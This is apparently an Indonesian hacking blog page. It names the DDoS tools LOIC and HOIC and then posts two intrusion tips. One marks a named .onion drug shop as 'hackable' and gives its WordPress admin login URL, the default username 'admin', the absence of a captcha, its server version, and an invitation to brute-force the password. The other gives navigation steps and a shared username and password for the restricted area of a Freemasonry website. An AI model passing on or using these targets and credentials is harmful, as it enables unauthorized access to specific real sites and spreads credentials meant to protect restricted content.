Distribusi dengan koleksi eksploitasi kerangka





DDoS Tools


overview


LOIC: Low-Orbit Ion Canon

HOIC: High-Orbit Ion Canon
(Tidak ada repositori open-source ditemukan untuk alat ini!?)

Misc

Kamis, 17 November 2016

The Weed Shop 2weed7xvnvdfovq6.onion Dapat diretas!!

​Admin Login URL: http://2weed7xvnvdfovq6.onion/wp-admin
Tidak ada Captcha dalam proses login halaman

Default username: admin
Password dapat menggunakan bruteforced!!
Running on SERVER: Apache PHP/5.5.9-1ubuntu4.20

Freemasonry restricted access files

ini adalah post yang membahas tentang dokumen freemasonry

pergi ke:
Http://WWW.Freemasons-Freemasonry.Com/

-pilih“Masonic Education Special Projects.”
-Select “Restricted Area – Masonic Exposures”
-Select “Enter Restricted Access Area”
-Setelah itu anda akan disuruh memasukan username dan password

Username: ashlar

Password: keystone

penting!! saat kamu memasukan username dan password, tidak perlu memakai huruf besar.

gunakan huruf kecil

Regards,

Alf4_H4d3s